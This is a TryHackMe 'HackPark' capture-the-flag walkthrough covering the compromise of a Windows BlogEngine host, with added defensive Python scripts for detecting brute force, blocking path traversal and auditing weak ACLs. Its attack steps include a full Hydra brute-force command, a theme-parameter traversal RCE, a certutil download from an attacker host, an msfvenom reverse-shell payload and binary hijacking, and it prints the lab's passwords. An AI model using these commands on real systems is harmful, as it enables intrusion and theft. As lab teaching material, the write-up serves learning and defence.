HackPark | Advanced Exploitation | TryHackMe
In this room, we are going to be hacking a Windows machine, first by brute forcing its login page using Burp Suite and Hydra. We will then gain an initial shell through RCE and escalate to administrator privileges using WinPEAS, xfreeRDP and the hijacking of a system binary.
Brute Forcing
A look at the website presents us with an image of a clown who, after a reverse image search, turns out to be Pennyworth. Let's proceed to log in.
When presented with a login page, start with simple password guesses, then test for SQL injection techniques (' or 1=1#). If neither works, brute force with Hydra.
In our case, we are left with the brute forcing option.
To start with, let's proxy the browser through Burp and capture the login request (the POST to /Account/login.aspx), since Hydra needs the exact form fields it carries.
Using Hydra
To brute force the admin password, we will be using Hydra. The general form of the command, followed by the one used here:
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form "<login path>:<form body with ^USER^ and ^PASS^>:<failure string>"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.179.73 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=MddBqpLN1hWr9bijpoWi2yEhYGX8TZy0VhEFHJuijaDDeluStBUEkreNat03ZMq0hfaIYNHjXR4O%2BI9oALpLR3RcE%2BQrTozslm%2FDOwBR3XAibZBZWu0%2BKYr4rxwXwgRfHTFhehzuDlDTweRPmIEgklaoALXWXPdtz34e4FM736SX4KDx&__EVENTVALIDATION=ZUizOr%2BTRWbOBq1aukdmu74Po%2BltFay13CfLhbPa4M2GlQHbrb4EOQ9orPrSAKatZVX1sSo03YgerRwMc2RfRkSZ8GlyWxPK070G6%2FLdvugFmTeq8z5x%2FOYy27k9m7Xt6ORHn%2Fxmj4LylOZ22fZbgJD0SkLt%2B4mjgW4fRlwM1kR7TgXS&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:login failed" -V -t 64
Bingo, we have the password: 1qaz2wsx. Time to log in.
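From the blue-team side, a Hydra run like the one above is very loud in the web server logs: one client address firing dozens of POSTs at the login form within seconds. The following is an added example for this writeup, not code from the room or from Hydra: it parses IIS W3C-style log lines (the field layout, the log lines themselves, the threshold, and the assumption that a failed login returns 200 while a successful one redirects with 302 are all constructed for the example) and flags clients that hit the login form more than a threshold number of times inside a sliding window, marking any redirect seen during the burst as a possible successful guess.

```python
"""Detect brute-force bursts against a login form in IIS W3C logs.

Added example for this writeup, not part of the room or of Hydra; the log lines,
field layout, status-code assumptions and thresholds below are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/Account/login.aspx"   # the form the Hydra command on this page targets


def build_sample_log() -> str:
    """Constructed IIS log: some normal traffic, then one client sending 65 POSTs in ~2 s."""
    lines = [
        "#Fields: date time cs-method cs-uri-stem c-ip sc-status",
        "2023-05-01 10:00:00 GET /Account/login.aspx 10.10.14.5 200",
        "2023-05-01 10:00:03 POST /Account/login.aspx 10.10.14.5 200",
        "2023-05-01 10:00:04 GET /post/welcome 10.10.14.9 200",
    ]
    # Assumed for the example: a failed login renders the form again (200, containing the
    # "login failed" text Hydra keys on), a successful one redirects (302).
    for i in range(64):
        lines.append(f"2023-05-01 10:01:{i // 32:02d} POST /Account/login.aspx 10.10.14.7 200")
    lines.append("2023-05-01 10:01:02 POST /Account/login.aspx 10.10.14.7 302")
    return "\n".join(lines)


def parse_iis(text: str):
    """Yield one dict per record, naming the columns from the #Fields header line."""
    fields = []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        rec = dict(zip(fields, raw.split()))
        rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        yield rec


def detect_login_bursts(text: str, threshold: int = 20,
                        window: timedelta = timedelta(seconds=60)) -> dict:
    """Return {client_ip: summary} for clients that POST to LOGIN_PATH at least
    `threshold` times within `window` (sliding window kept per client)."""
    recent = defaultdict(deque)   # client ip -> timestamps of login POSTs still inside the window
    alerts = {}
    for rec in parse_iis(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != LOGIN_PATH.lower():
            continue
        ip, ts = rec["c-ip"], rec["ts"]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:          # drop attempts that fell out of the window
            q.popleft()
        if len(q) < threshold:
            continue
        a = alerts.setdefault(ip, {"peak_attempts": 0, "first": q[0], "last": ts,
                                   "redirect_after_burst": False})
        a["peak_attempts"] = max(a["peak_attempts"], len(q))
        a["last"] = ts
        # A redirect in the middle of a burst is the signal worth paging on:
        # the guessing may have succeeded, so the account needs a password reset.
        if rec["sc-status"] == "302":
            a["redirect_after_burst"] = True
    return alerts


if __name__ == "__main__":
    for ip, a in detect_login_bursts(build_sample_log()).items():
        flag = " ; REDIRECT SEEN, possible successful guess" if a["redirect_after_burst"] else ""
        print(f"{ip}: {a['peak_attempts']} login POSTs between {a['first']} and {a['last']}{flag}")
```

Tune the threshold and window to the site's real traffic; Hydra's `-t 64` on this page means 64 parallel connections, so the burst is far above anything a human produces, but a slower spray (a few attempts per minute per address) needs a longer window or a per-account rather than per-address count.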
Initial Shell
Now that we are logged into the admin panel, we can publish posts, but that alone does not get us a shell, so we need to look for a vulnerability in the software itself to exploit.
Looking around the panel, we see BlogEngine Version: 3.3.6.0, which seems interesting. Using searchsploit or a Google search, we can find an exploit for this version.
We get five possible exploits; in our case we will use the Directory Traversal / Remote Code Execution one.
Reading the instructions in the 46353.cs exploit, we are told to save the payload as PostList.ascx.cs. The exploit's header comment explains how it is triggered: the vulnerability is triggered by accessing the base URL for the blog with a theme override specified like so:
http://10.10.10.10/?theme=../../App_Data/files
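The theme override works because the application joins the request parameter onto its themes directory without checking where the result ends up, so ../../App_Data/files points it at the upload folder. The block below is an added example for this writeup, written in Python rather than BlogEngine's C#, with an assumed themes directory (/srv/blog/themes) used only for illustration: it shows the vulnerable join beside a hardened resolver that allow-lists the parameter's shape and then verifies the resolved path still lives under the themes root, and it exercises both against several traversal shapes, not just the one on this page.

```python
"""Path-traversal check of the kind that the ?theme=../../App_Data/files trick defeats.

Added example for this writeup; Python, not BlogEngine's C#, and the themes
directory below is an assumed layout, not the real application's.
"""
import re
from pathlib import Path

THEMES_ROOT = Path("/srv/blog/themes")   # assumed layout for the example
CONTROL_FILE = "PostList.ascx"           # the control name the exploit on this page uses


def resolve_theme_unsafe(theme: str) -> Path:
    """Vulnerable pattern: the request parameter is joined straight onto the themes
    root, so '../../App_Data/files' resolves to a directory an uploader can write to."""
    return (THEMES_ROOT / theme / CONTROL_FILE).resolve()


def escapes_root(path: Path, root: Path = THEMES_ROOT) -> bool:
    """True when `path` is not inside `root` once '..' segments are collapsed."""
    return root.resolve() not in path.resolve().parents


def resolve_theme_safe(theme: str) -> Path:
    """Hardened version: allow-list the parameter's shape first (no separators,
    no dots), then confirm the resolved path is still under THEMES_ROOT. The second
    check is a backstop for anything the first one's pattern might let through."""
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", theme or ""):
        raise ValueError(f"rejected theme name: {theme!r}")
    candidate = (THEMES_ROOT / theme / CONTROL_FILE).resolve()
    if escapes_root(candidate):
        raise ValueError(f"theme path escapes themes root: {candidate}")
    return candidate


def is_accepted(theme: str) -> bool:
    """Convenience wrapper: does the hardened resolver accept this theme value?"""
    try:
        resolve_theme_safe(theme)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for theme in ("Standard", "../../App_Data/files", "..\\..\\App_Data\\files", "a/../../etc"):
        unsafe = resolve_theme_unsafe(theme)
        verdict = "accepted" if is_accepted(theme) else "rejected"
        print(f"{theme!r:28} unsafe -> {unsafe} (escapes={escapes_root(unsafe)}); safe -> {verdict}")
```

Note the backslash variant: on a POSIX host the unsafe resolver reports escapes=False for it because the backslash is not a separator there, while on Windows it traverses just like the forward-slash form. That platform dependence is why the hardened version rejects by shape rather than relying on the containment check alone.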
Now that we have the payload ready, we upload it to the website, start a netcat listener, and then request the theme URL above to trigger it.
Bingo! We have an initial shell. Time to escalate privileges.
Let's cd to the Public directory, where we can write, and download the winPEAS executable there using the Windows certutil command:
certutil -urlcache -f http://<attacker-ip>:8000/winPEASx64.exe win.exe
Once winPEAS is downloaded, we run it. It enumerates all the information we need to know about this machine.
Surprisingly, we have an administrator user and their password revealed:
DefaultUsername: administrator
DefaultPassword: 4q6XvFES7Fdxs
We can use these credentials to log in with xfreeRDP.
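The DefaultUsername/DefaultPassword pair winPEAS printed is the Winlogon autologon configuration, and a clear-text DefaultPassword there is readable by any local user. As an added example for this writeup (not winPEAS code, and the `reg query` output below is constructed with a sample password rather than the room's), here is a small audit that parses the Winlogon key's values and reports the findings a hardening review would raise.

```python
"""Audit Winlogon for stored autologon credentials.

Added example for this writeup, not from winPEAS; the `reg query` output below
is constructed and the password in it is a sample value, not the room's.
"""
import re
import subprocess
import sys

WINLOGON_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed to look like `reg query <WINLOGON_KEY>` on a host with autologon enabled.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    administrator
    DefaultDomainName    REG_SZ    WORKGROUP
    DefaultPassword    REG_SZ    Sample-Not-A-Real-Password
    Shell    REG_SZ    explorer.exe
"""

VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")


def parse_reg_query(text: str) -> dict:
    """Map value name -> data from `reg query` output. Registry value names are
    case-insensitive, so they are lower-cased here."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group("name").lower()] = m.group("data").strip()
    return values


def audit_autologon(values: dict) -> list:
    """Return (severity, message) findings for the parsed Winlogon values."""
    findings = []
    autologon_on = values.get("autoadminlogon", "0").strip() == "1"
    has_password = bool(values.get("defaultpassword"))
    user = values.get("defaultusername", "<unset>")
    if has_password:
        findings.append(("high", f"DefaultPassword is stored in clear text for user {user!r}; "
                                 "any local user (and tools like winPEAS) can read it"))
    if autologon_on and not has_password:
        findings.append(("info", "AutoAdminLogon=1 with no DefaultPassword value: the secret may be "
                                 "held as an LSA secret instead (as the Sysinternals Autologon tool "
                                 "stores it), which is the preferred form if autologon is required"))
    if autologon_on and user.lower() == "administrator":
        findings.append(("high", "AutoAdminLogon is enabled for the built-in Administrator account"))
    return findings


def audit_host() -> list:
    """Run the real query on Windows; elsewhere fall back to the constructed sample."""
    if sys.platform == "win32":
        out = subprocess.run(["reg", "query", WINLOGON_KEY], capture_output=True, text=True).stdout
    else:
        out = SAMPLE_REG_OUTPUT
    return audit_autologon(parse_reg_query(out))


if __name__ == "__main__":
    for severity, message in audit_host():
        print(f"[{severity}] {message}")
```

Run on a Windows host it queries the live key; anywhere else it audits the sample so the logic can be read and tested offline. The remediation the findings point at is to remove DefaultPassword (and AutoAdminLogon unless a kiosk genuinely needs it), never to leave a privileged account's password in a world-readable registry value.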
xfreeRDP
xfreerdp /f /u:USERNAME /p:PASSWORD /v:HOST[:PORT] /tls-seclevel:0 /timeout:80000
While running xfreerdp, you may encounter this error: [01:13:56:893] [3974:3975] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
Solve it by adding /tls-seclevel:0 /timeout:80000 to the command, as shown above.
Bingo! Now we have administrator access and control of the machine.
Method 2: Escalate privileges by hijacking a system binary
In the winPEAS output, we see an unquoted path where we can write and create files: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
Let's cd to this path: C:\Program Files (x86)\SystemScheduler
Here we need to look for a scheduled task that keeps running a binary from this directory; once we find it, we replace that binary with our payload, using the exact same name.
Found it?
Using msfvenom, we create a payload with the exact name, Message.exe:
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=4444 -f exe -o Message.exe
Once the payload is created, transfer it from your Kali machine to the Public directory on the target (with certutil, as before); meanwhile, start a netcat listener on the same port we set in the payload.
Next we copy the payload from the Public directory to the directory the mysterious service runs from, using the copy command:
copy Message.exe "C:\Program Files (x86)\SystemScheduler\Message.exe"
If the copy succeeds, the scheduled task will run our binary and we get a reverse shell as NT AUTHORITY\SYSTEM, with full administrator rights.
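The root cause of this method is not the scheduler itself but a directory on a privileged execution path that Everyone can write to, so the defensive check is an ACL review of every directory that services and scheduled tasks launch binaries from. The block below is an added example for this writeup, not winPEAS or icacls code: it parses constructed `icacls` output (two directories, one weak and one sane, laid out the way icacls prints them; not output from the room's machine) and reports any ACE that gives a low-privilege principal write or replace rights.

```python
"""Flag directories on service / scheduled-task paths that low-privilege principals can write to.

Added example for this writeup, not from winPEAS or icacls; the output below is
constructed to match icacls' layout (path, then one ACE per line).
"""
import re

# Constructed `icacls "<dir>"` output for two directories, one weak and one sane.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\SystemScheduler Everyone:(OI)(CI)(M)
                                       NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                       BUILTIN\Administrators:(OI)(CI)(F)

C:\Program Files\Example Service NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                 BUILTIN\Administrators:(OI)(CI)(F)
                                 BUILTIN\Users:(OI)(CI)(RX)

Successfully processed 2 files; Failed processing 0 files
"""

# Principals that every interactive or network user effectively is.
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users",
            r"nt authority\interactive", r"nt authority\users"}
# Simple and specific rights that let a principal add or replace files in the directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

# The path can contain spaces and colons, so the principal is matched from the fixed
# shapes icacls prints rather than by splitting the line on whitespace.
PRINCIPAL = (r"(?:Everyone|CREATOR OWNER|NT AUTHORITY\\[^:]+|BUILTIN\\[^:]+"
             r"|NT SERVICE\\[^:]+|[^\\ ]+\\[^: ]+)")
ACE_RE = re.compile(r"^(?:(?P<path>.+?) )?\s*(?P<principal>" + PRINCIPAL
                    + r"):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(text: str) -> dict:
    """Map directory path -> list of (principal, set_of_rights) from icacls output."""
    acls, current = {}, None
    for line in text.splitlines():
        m = ACE_RE.match(line)
        if not m:
            continue                      # blank lines and the summary line
        path = (m.group("path") or "").strip()
        if path:                          # first line of a block carries the path
            current = path
            acls[current] = []
        if current is None:
            continue
        rights = set()
        for tok in re.findall(r"\(([^)]*)\)", m.group("rights")):
            if tok in INHERIT_FLAGS:
                continue
            rights.update(t.strip() for t in tok.split(","))   # specific rights come as (RD,WD,AD)
        acls[current].append((m.group("principal"), rights))
    return acls


def find_writable_by_low_priv(acls: dict) -> list:
    """Return (path, principal, offending_rights) for every ACE that hands a
    low-privilege principal write/replace rights on the directory."""
    findings = []
    for path, aces in acls.items():
        for principal, rights in aces:
            bad = rights & WRITE_RIGHTS
            if principal.lower() in LOW_PRIV and bad:
                findings.append((path, principal, sorted(bad)))
    return findings


if __name__ == "__main__":
    for path, who, rights in find_writable_by_low_priv(parse_icacls(SAMPLE_ICACLS)):
        print(f"WEAK: {who} has {','.join(rights)} on {path}")
```

Feed it the real `icacls` output of each directory named in `sc qc` or `schtasks /query /v` results and the finding for SystemScheduler is exactly the condition winPEAS flagged: Everyone with Modify on a directory whose binary runs as SYSTEM. The fix is to restrict the directory to Administrators and SYSTEM (and to quote the service path), after which the copy step in this writeup fails with access denied.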
Hurrah! We have successfully compromised this machine and can now collect all the flags.
Thank you for reading. Happy hacking!